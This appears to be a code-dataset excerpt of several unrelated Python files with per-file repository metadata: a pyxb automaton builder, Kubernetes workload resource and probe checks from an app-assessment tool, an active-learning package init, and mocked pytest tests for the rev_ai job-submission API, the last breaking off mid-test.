    cancel_use = Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'cancelReason'))
    cancel_symbol = pyxb.binding.content.ElementUse(cancel_use, _loc(275, 3))
    cancel_state = fac.State(cancel_symbol, is_initial=False,
                             final_update=set([fac.UpdateInstruction(cc_1, False)]),
                             is_unordered_catenation=False)

    states = point_states + [cancel_state]

    # From any calling point the automaton may move to any calling point
    # (incrementing cc_0), or on to cancelReason (checking cc_0 without an
    # increment).  Fresh Transition/UpdateInstruction objects are built per
    # source state, as in the generated original.
    for src in point_states:
        transitions = [fac.Transition(dst, [fac.UpdateInstruction(cc_0, True)])
                       for dst in point_states]
        transitions.append(fac.Transition(cancel_state, [fac.UpdateInstruction(cc_0, False)]))
        src._set_transitionSet(transitions)

    # cancelReason can only loop on itself while cc_1 permits.
    cancel_state._set_transitionSet([
        fac.Transition(cancel_state, [fac.UpdateInstruction(cc_1, True)])])

    return fac.Automaton(states, counters, False, containing_state=None)
Schedule._Automaton = _BuildAutomaton_()
| 64.661278
| 366
| 0.759724
| 10,029
| 83,995
| 6.083259
| 0.049656
| 0.030094
| 0.052189
| 0.077497
| 0.860463
| 0.851481
| 0.826567
| 0.813749
| 0.786097
| 0.773886
| 0
| 0.017223
| 0.121436
| 83,995
| 1,298
| 367
| 64.711094
| 0.809513
| 0.097446
| 0
| 0.543665
| 1
| 0.00861
| 0.308549
| 0.240825
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00492
| false
| 0.00984
| 0.093481
| 0
| 0.429274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e28a1c30d65a0782e3e095321b214250b6d3147c
| 13,991
|
py
|
Python
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 5
|
2021-10-29T20:27:51.000Z
|
2022-02-15T21:20:12.000Z
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 10
|
2021-10-19T16:37:42.000Z
|
2022-01-28T22:55:47.000Z
|
build/checks.py
|
bcgov/AppAssessment
|
e304e078c0835a7e2a9dc84e4c53375486653a25
|
[
"Apache-2.0"
] | 2
|
2021-11-08T15:48:33.000Z
|
2021-11-08T16:32:04.000Z
|
from jsonpath_ng import jsonpath, parse
import yaml
from fractions import Fraction
def notApplicableCheck(workloadData):
    """Placeholder check: always reports notApplicable, ignoring the workload."""
    result = {}
    result['status'] = 'notApplicable'
    result['text'] = ''
    result['group'] = 'notApplicable'
    return result
#end
def declarativeComponentCheck(workloadData):
    """Pass when the workload kind is a declarative controller type."""
    declarative_kinds = ('CronJob', 'DaemonSet', 'Deployment', 'StatefulSet', 'DeploymentConfig')
    kind = workloadData['kind']
    status = 'pass' if kind in declarative_kinds else 'fail'
    return {'status': status, 'text': kind}
#end
def rollingUpdateCheck(workloadData):
    """Check that the workload uses a rolling update strategy."""
    rolling_values = ("RollingUpdate", "Rolling")
    strategy = parse('spec.strategy.type').find(workloadData)
    update_strategy = parse('spec.updateStrategy.type').find(workloadData)
    # Deployments use spec.strategy; StatefulSets/DaemonSets use
    # spec.updateStrategy — accept either location.
    if len(strategy) == 1 and strategy[0].value in rolling_values:
        return {'status': 'pass', 'text': strategy[0].value}
    if len(update_strategy) == 1 and update_strategy[0].value in rolling_values:
        return {'status': 'pass', 'text': update_strategy[0].value}
    return {'status': 'warning',
            'text': 'In most cases the spec.strategy.type or spec.updateStrategy.type should be either "Rolling" or "RollingUpdate". In stateful applications this not always possible.'}
#end
def cpuRequestCheck(workloadData):
    """Verify every container in the pod template declares a CPU request."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # Build the report list in one pass; the original repeated list
        # concatenation was accidentally quadratic.
        container_cpu_requests = [
            {'container_name': c['name'], 'cpu_request': c['resources']['requests']['cpu']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_cpu_requests)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU requests specified. All container specifications should include CPU requests"
    return retval
#end
def memoryRequestCheck(workloadData):
    """Verify every container in the pod template declares a memory request."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].resources.requests.memory').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_memory_requests = [
            {'container_name': c['name'], 'memory_request': c['resources']['requests']['memory']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_memory_requests)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory requests specified. All container specifications should include memory requests"
    return retval
#end
def cpuLimitCheck(workloadData):
    """Verify every container in the pod template declares a CPU limit."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_cpu_limits = [
            {'container_name': c['name'], 'cpu_limit': c['resources']['limits']['cpu']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_cpu_limits)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU limits specified. All container specifications should include CPU limits"
    return retval
#end
def cpuLimitRequestRatio(workloadData):
    """Warn when any container's CPU limit exceeds 3x its CPU request.

    BUGFIX: the original overwrote status/text on every loop iteration, so a
    'warning' raised for one container was clobbered by a later container's
    'pass', and only the last container's ratio was reported.  The status is
    now sticky and all ratios are listed.
    """
    retval = {'status': 'notApplicable', 'text': ''}
    matchesLimit = parse('spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
    matchesRequest = parse('spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    # Clearer than the original `(len(a) and len(b)) > 0` truthiness trick.
    if len(matchesLimit) > 0 and len(matchesRequest) > 0 and len(matchesLimit) == numContainers:
        retval['status'] = 'pass'
        ratios = []
        for container in containers:
            # Strip non-digit characters (unit suffixes such as 'm').
            # NOTE(review): this ignores units, so '1' (core) vs '500m'
            # compares 1 to 500 — confirm requests/limits use the same unit.
            cpuLimit = int("".join(filter(str.isdigit, container['resources']['limits']['cpu'])))
            # NOTE(review): a zero CPU request raises ZeroDivisionError here,
            # matching the original behavior — confirm requests are non-zero.
            cpuRequest = int("".join(filter(str.isdigit, container['resources']['requests']['cpu'])))
            ratios.append("Ratio: " + str(Fraction(cpuLimit, cpuRequest)))
            if float(cpuLimit / cpuRequest) > 3:
                retval['status'] = 'warning'
        retval['text'] = "\n".join(ratios)
    else:
        retval['status'] = 'fail'
        retval['text'] = "could not find both a cpu limit and a cpu request"
    return retval
#def
def memoryLimitCheck(workloadData):
    """Verify every container in the pod template declares a memory limit."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].resources.limits.memory').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_memory_limits = [
            {'container_name': c['name'], 'memory_limit': c['resources']['limits']['memory']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_memory_limits)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory limits specified. All container specifications should include memory limits"
    return retval
#end
def cronjobCpuRequestCheck(workloadData):
    """Verify every container in a CronJob's pod template declares a CPU request."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
    containers = workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_cpu_requests = [
            {'container_name': c['name'], 'cpu_request': c['resources']['requests']['cpu']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_cpu_requests)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU requests specified. All container specifications should include CPU requests"
    return retval
#end
def cronjobMemoryRequestCheck(workloadData):
    """Verify every container in a CronJob's pod template declares a memory request."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.memory').find(workloadData)
    containers = workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_memory_requests = [
            {'container_name': c['name'], 'memory_request': c['resources']['requests']['memory']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_memory_requests)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory requests specified. All container specifications should include memory requests"
    return retval
#end
def cronjobCpuLimitCheck(workloadData):
    """Verify every container in a CronJob's pod template declares a CPU limit."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
    containers = workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_cpu_limits = [
            {'container_name': c['name'], 'cpu_limit': c['resources']['limits']['cpu']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_cpu_limits)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have CPU limits specified. All container specifications should include CPU limits"
    return retval
#end
def cronjobMemoryLimitCheck(workloadData):
    """Verify every container in a CronJob's pod template declares a memory limit."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.memory').find(workloadData)
    containers = workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']
    numContainers = len(containers)
    if len(matches) > 0 and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_memory_limits = [
            {'container_name': c['name'], 'memory_limit': c['resources']['limits']['memory']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_memory_limits)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have memory limits specified. All container specifications should include memory limits"
    return retval
#end
def cronjobCpuLimitRequestRatio(workloadData):
    """Warn when any CronJob container's CPU limit exceeds 3x its CPU request.

    BUGFIX: the original overwrote status/text on every loop iteration, so a
    'warning' raised for one container was clobbered by a later container's
    'pass', and only the last container's ratio was reported.  The status is
    now sticky and all ratios are listed.
    """
    retval = {'status': 'notApplicable', 'text': ''}
    matchesLimit = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
    matchesRequest = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
    containers = workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']
    numContainers = len(containers)
    # Clearer than the original `(len(a) and len(b)) > 0` truthiness trick.
    if len(matchesLimit) > 0 and len(matchesRequest) > 0 and len(matchesLimit) == numContainers:
        retval['status'] = 'pass'
        ratios = []
        for container in containers:
            # Strip non-digit characters (unit suffixes such as 'm').
            # NOTE(review): this ignores units — confirm requests/limits use
            # the same unit; a zero request raises ZeroDivisionError (as in
            # the original).
            cpuLimit = int("".join(filter(str.isdigit, container['resources']['limits']['cpu'])))
            cpuRequest = int("".join(filter(str.isdigit, container['resources']['requests']['cpu'])))
            ratios.append("Ratio: " + str(Fraction(cpuLimit, cpuRequest)))
            if float(cpuLimit / cpuRequest) > 3:
                retval['status'] = 'warning'
        retval['text'] = "\n".join(ratios)
    else:
        retval['status'] = 'fail'
        retval['text'] = "could not find both a cpu limit and a cpu request"
    return retval
#def
def probeHeader(workloadData):
    """Group-header row introducing the Application Health section of the report."""
    return {'status': 'groupHeader', 'title': 'Application Health', 'text': ''}
#end
def resourceUtilizationHeader(workloadData):
    """Group-header row introducing the Resource Allocation section of the report."""
    return {'status': 'groupHeader', 'title': 'Resource Allocation', 'text': ''}
#end
def livenessProbeCheck(workloadData):
    """Verify every container in the pod template defines a non-empty liveness probe."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].livenessProbe').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    # An empty probe mapping ({}) counts as missing.
    noEmptyProbes = all(len(match.value.keys()) > 0 for match in matches)
    if len(matches) > 0 and noEmptyProbes and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_liveness_probes = [
            {'container_name': c['name'], 'livenessProbe': c['livenessProbe']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_liveness_probes)
    else:
        retval['status'] = 'fail'
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have a liveness probe defined. All containers should have one."
    return retval
#end
def readinessProbeCheck(workloadData):
    """Verify every container in the pod template defines a non-empty readiness probe."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.containers[*].readinessProbe').find(workloadData)
    containers = workloadData['spec']['template']['spec']['containers']
    numContainers = len(containers)
    # An empty probe mapping ({}) counts as missing.
    noEmptyProbes = all(len(match.value.keys()) > 0 for match in matches)
    if len(matches) > 0 and noEmptyProbes and len(matches) == numContainers:
        retval['status'] = 'pass'
        # One-pass comprehension replaces the quadratic list concatenation.
        container_readiness_probes = [
            {'container_name': c['name'], 'readinessProbe': c['readinessProbe']}
            for c in containers
        ]
        retval['text'] = yaml.dump(container_readiness_probes)
    else:
        retval['status'] = 'fail'
        # Message typo fixed: "defines" -> "defined".
        retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have a readiness probe defined. All containers should have one."
    return retval
#end
def statelessCheck(workloadData):
    """Warn if a supposedly stateless workload mounts persistent volume claims."""
    retval = {'status': 'notApplicable', 'text': ''}
    matches = parse('spec.template.spec.volumes[*].persistentVolumeClaim').find(workloadData)
    if len(matches) > 0:
        retval['status'] = 'warning'
        # One-pass comprehension replaces the quadratic list concatenation.
        pvcList = [match.value for match in matches]
        retval['text'] = "stateless application should not need a persistent volume. The following persistent volume claims were found: \n" + yaml.dump(pvcList)
    else:
        retval['status'] = 'pass'
    return retval
#end
| 49.264085
| 186
| 0.691659
| 1,494
| 13,991
| 6.405622
| 0.097055
| 0.061442
| 0.065204
| 0.103239
| 0.840961
| 0.81139
| 0.804911
| 0.804911
| 0.785684
| 0.776489
| 0
| 0.002066
| 0.135087
| 13,991
| 283
| 187
| 49.438163
| 0.788778
| 0.00386
| 0
| 0.736842
| 0
| 0.004386
| 0.335513
| 0.068539
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0.070175
| 0.013158
| 0.004386
| 0.171053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e2ab6de6c6a0fa80dca98ca9039a0a78ed4a9df5
| 219
|
py
|
Python
|
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
from .learners import ActiveLearner, BayesianOptimizer, Committee, CommitteeRegressor, ActiveCompletion

# Public API of the models package: re-export the learner classes so callers
# can import them directly from this package.
__all__ = [
    'ActiveLearner', 'BayesianOptimizer',
    'Committee', 'CommitteeRegressor', 'ActiveCompletion'
]
| 31.285714
| 103
| 0.780822
| 14
| 219
| 11.928571
| 0.642857
| 0.359281
| 0.467066
| 0.682635
| 0.874252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118721
| 219
| 6
| 104
| 36.5
| 0.865285
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c85827d450882fbb1ee2d24b61b9466f08fbf04
| 17,975
|
py
|
Python
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | 2
|
2018-10-23T00:45:22.000Z
|
2018-11-25T08:57:27.000Z
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | 1
|
2018-10-23T00:44:41.000Z
|
2018-10-23T00:44:41.000Z
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Unit tests for job endpoints"""
import json
import pytest
from src.rev_ai.models.customer_url_data import CustomerUrlData
from src.rev_ai.apiclient import RevAiAPIClient
from src.rev_ai.models.asynchronous import Job, JobStatus, SpeakerName
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
# --- Shared constants for the job-endpoint tests ---
JOB_ID = '1'
TOKEN = "token"
METADATA = 'test'
NOTIFICATION_URL = 'https://example.com/'
NOTIFICATION_AUTH = 'notification auth headers'
CREATED_ON = '2018-05-05T23:23:22.29Z'
SOURCE_URL = 'https://example.com/test.mp3'
SOURCE_AUTH = 'source auth headers'
FILENAME = 'test.mp3'
# Absolute endpoint URLs derived from the client's base URL.
JOB_ID_URL = urljoin(RevAiAPIClient.base_url, 'jobs/{}'.format(JOB_ID))
JOBS_URL = urljoin(RevAiAPIClient.base_url, 'jobs')
CUSTOM_VOCAB = [{"phrases": ["word one", "word two"]}]
CUSTOM_VOCAB_ID = "vid"
LANGUAGE = 'en'
TRANSCRIBER = 'machine_v2'
# CustomerUrlData pairs a URL with its auth headers (see models import above).
SOURCE_CONFIG = CustomerUrlData(SOURCE_URL, SOURCE_AUTH)
NOTIFICATION_CONFIG = CustomerUrlData(NOTIFICATION_URL, NOTIFICATION_AUTH)
@pytest.mark.usefixtures('mock_session', 'make_mock_response')
class TestJobEndpoints():
def test_get_job_details_with_success(self, mock_session, make_mock_response):
    # Arrange: the API reports a completed transcription job.
    created_on = '2018-05-05T23:23:22.29Z'
    job_json = {
        'id': JOB_ID,
        'status': 'transcribed',
        'created_on': created_on
    }
    mock_session.request.return_value = make_mock_response(url=JOB_ID_URL, json_data=job_json)
    client = RevAiAPIClient(TOKEN)

    # Act
    job = client.get_job_details(JOB_ID)

    # Assert: the JSON is parsed into a Job model and exactly one GET is made.
    assert job == Job(JOB_ID, created_on, JobStatus.TRANSCRIBED)
    mock_session.request.assert_called_once_with("GET",
                                                 JOB_ID_URL,
                                                 headers=client.default_headers)
@pytest.mark.parametrize('id', [None, ''])
def test_get_job_details_with_no_job_id(self, id, mock_session):
    # A falsy job id must be rejected client-side before any HTTP request.
    with pytest.raises(ValueError, match='id_ must be provided'):
        RevAiAPIClient(TOKEN).get_job_details(id)
def test_get_list_of_jobs_limit_with_success(self, mock_session, make_mock_response):
    # Arrange: the API returns two jobs for a page size of 2.
    created_on = '2018-05-05T23:23:22.29Z'
    jobs_json = [
        {'id': JOB_ID, 'status': 'transcribed', 'created_on': created_on},
        {'id': '2', 'status': 'in_progress', 'created_on': created_on}
    ]
    url = JOBS_URL + "?limit=2"
    mock_session.request.return_value = make_mock_response(url=url, json_data=jobs_json)
    client = RevAiAPIClient(TOKEN)

    # Act
    jobs = client.get_list_of_jobs(limit=2)

    # Assert: a list of both jobs, fetched with a single GET.
    assert isinstance(jobs, list)
    assert len(jobs) == 2
    mock_session.request.assert_called_once_with("GET", url, headers=client.default_headers)
def test_get_list_of_jobs_starting_after_with_success(self, mock_session, make_mock_response):
    # Arrange: one job remains after the pagination cursor '4'.
    created_on = '2018-05-05T23:23:22.29Z'
    jobs_json = [
        {'id': JOB_ID, 'status': 'transcribed', 'created_on': created_on}
    ]
    url = JOBS_URL + "?starting_after=4"
    mock_session.request.return_value = make_mock_response(url=url, json_data=jobs_json)
    client = RevAiAPIClient(TOKEN)

    # Act
    jobs = client.get_list_of_jobs(starting_after="4")

    # Assert: a single-element list, fetched with a single GET.
    assert isinstance(jobs, list)
    assert len(jobs) == 1
    mock_session.request.assert_called_once_with("GET", url, headers=client.default_headers)
def test_submit_job_url_with_success(self, mock_session, make_mock_response):
    # Submitting by media URL with every positional option posts the full
    # option set and parses the reply into a Job model.
    data = {
        'id': JOB_ID,
        'status': 'in_progress',
        'created_on': CREATED_ON,
        'metadata': METADATA,
        'skip_diarization': True,
        'skip_punctuation': True,
        'speaker_channels_count': 1,
        'filter_profanity': True,
        'remove_disfluencies': True,
        'delete_after_seconds': 0,
        'language': LANGUAGE,
        'transcriber': TRANSCRIBER
    }
    response = make_mock_response(url=JOB_ID_URL, json_data=data)
    mock_session.request.return_value = response
    client = RevAiAPIClient(TOKEN)
    # NOTE: arguments are passed positionally, so their order here must match
    # the submit_job_url signature exactly.
    res = client.submit_job_url(SOURCE_URL, METADATA,
                                NOTIFICATION_URL, True,
                                True, 1, CUSTOM_VOCAB, True,
                                True, 0, LANGUAGE, CUSTOM_VOCAB_ID,
                                TRANSCRIBER)
    assert res == Job(JOB_ID,
                      CREATED_ON,
                      JobStatus.IN_PROGRESS,
                      metadata=METADATA,
                      skip_punctuation=True,
                      skip_diarization=True,
                      speaker_channels_count=1,
                      filter_profanity=True,
                      remove_disfluencies=True,
                      delete_after_seconds=0,
                      language=LANGUAGE,
                      transcriber=TRANSCRIBER)
    # Exactly one POST carrying the legacy callback_url/media_url fields.
    mock_session.request.assert_called_once_with(
        "POST",
        JOBS_URL,
        json={
            'media_url': SOURCE_URL,
            'callback_url': NOTIFICATION_URL,
            'metadata': METADATA,
            'skip_diarization': True,
            'skip_punctuation': True,
            'speaker_channels_count': 1,
            'custom_vocabularies': CUSTOM_VOCAB,
            'filter_profanity': True,
            'remove_disfluencies': True,
            'delete_after_seconds': 0,
            'language': LANGUAGE,
            'custom_vocabulary_id': CUSTOM_VOCAB_ID,
            'transcriber': TRANSCRIBER
        },
        headers=client.default_headers)
def test_submit_job_url_with_auth_options(self, mock_session, make_mock_response):
    # Submitting with source_config/notification_config (URL + auth headers)
    # posts those objects instead of the legacy media_url/callback_url fields.
    data = {
        'id': JOB_ID,
        'status': 'in_progress',
        'created_on': CREATED_ON,
        'metadata': METADATA,
        'skip_diarization': True,
        'skip_punctuation': True,
        'speaker_channels_count': 1,
        'filter_profanity': True,
        'remove_disfluencies': True,
        'delete_after_seconds': 0,
        'language': LANGUAGE,
        'transcriber': TRANSCRIBER
    }
    response = make_mock_response(url=JOB_ID_URL, json_data=data)
    mock_session.request.return_value = response
    client = RevAiAPIClient(TOKEN)
    res = client.submit_job_url(metadata=METADATA, skip_diarization=True, skip_punctuation=True,
                                speaker_channels_count=1, custom_vocabularies=CUSTOM_VOCAB,
                                filter_profanity=True, remove_disfluencies=True,
                                delete_after_seconds=0, language=LANGUAGE,
                                custom_vocabulary_id=CUSTOM_VOCAB_ID, transcriber=TRANSCRIBER,
                                source_config=SOURCE_CONFIG,
                                notification_config=NOTIFICATION_CONFIG)
    assert res == Job(JOB_ID,
                      CREATED_ON,
                      JobStatus.IN_PROGRESS,
                      metadata=METADATA,
                      skip_punctuation=True,
                      skip_diarization=True,
                      speaker_channels_count=1,
                      filter_profanity=True,
                      remove_disfluencies=True,
                      delete_after_seconds=0,
                      language=LANGUAGE,
                      transcriber=TRANSCRIBER)
    # The CustomerUrlData objects must serialize to {'url', 'auth_headers'}.
    mock_session.request.assert_called_once_with(
        "POST",
        JOBS_URL,
        json={
            'source_config': {'url': SOURCE_URL, 'auth_headers': SOURCE_AUTH},
            'notification_config': {'url': NOTIFICATION_URL, 'auth_headers': NOTIFICATION_AUTH},
            'metadata': METADATA,
            'skip_diarization': True,
            'skip_punctuation': True,
            'speaker_channels_count': 1,
            'custom_vocabularies': CUSTOM_VOCAB,
            'filter_profanity': True,
            'remove_disfluencies': True,
            'delete_after_seconds': 0,
            'language': LANGUAGE,
            'custom_vocabulary_id': CUSTOM_VOCAB_ID,
            'transcriber': TRANSCRIBER
        },
        headers=client.default_headers)
def test_submit_job_url_with_human_transcription_and_success(self, mock_session,
make_mock_response):
segments = [{
'start': 1.0,
'end': 2.0
}]
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': CREATED_ON,
'transcriber': 'human',
'verbatim': True,
'segments_to_transcribe': segments
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.submit_job_url(SOURCE_URL, transcriber='human', verbatim=True, rush=False,
segments_to_transcribe=segments,
speaker_names=[SpeakerName('Kyle Bridburg')])
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
transcriber='human',
verbatim=True,
segments_to_transcribe=segments)
mock_session.request.assert_called_once_with(
'POST',
JOBS_URL,
json={
'media_url': SOURCE_URL,
'transcriber': 'human',
'verbatim': True,
'segments_to_transcribe': segments,
'speaker_names': [{'display_name': 'Kyle Bridburg'}]
},
headers=client.default_headers)
def test_submit_job_local_file_with_success(self, mocker, mock_session, make_mock_response):
created_on = '2018-05-05T23:23:22.29Z'
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': created_on,
'metadata': METADATA,
'callback_url': NOTIFICATION_URL,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
with mocker.patch('src.rev_ai.apiclient.open', create=True)() as file:
res = client.submit_job_local_file(FILENAME, METADATA,
NOTIFICATION_URL, True,
True, 1, CUSTOM_VOCAB, True,
True, 0, LANGUAGE, CUSTOM_VOCAB_ID,
TRANSCRIBER)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
callback_url=NOTIFICATION_URL,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
files={
'media': (FILENAME, file),
'options': (
None,
json.dumps({
'metadata': METADATA,
'callback_url': NOTIFICATION_URL,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
}, sort_keys=True)
)
},
headers=client.default_headers)
def test_submit_job_local_file_auth_options_with_success(self, mocker, mock_session,
make_mock_response):
created_on = '2018-05-05T23:23:22.29Z'
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': created_on,
'metadata': METADATA,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
with mocker.patch('src.rev_ai.apiclient.open', create=True)() as file:
res = client.submit_job_local_file(filename=FILENAME, metadata=METADATA,
callback_url=None, skip_diarization=True,
skip_punctuation=True, speaker_channels_count=1,
custom_vocabularies=CUSTOM_VOCAB,
filter_profanity=True, remove_disfluencies=True,
delete_after_seconds=0, language=LANGUAGE,
custom_vocabulary_id=CUSTOM_VOCAB_ID,
transcriber=TRANSCRIBER,
notification_config=NOTIFICATION_CONFIG)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
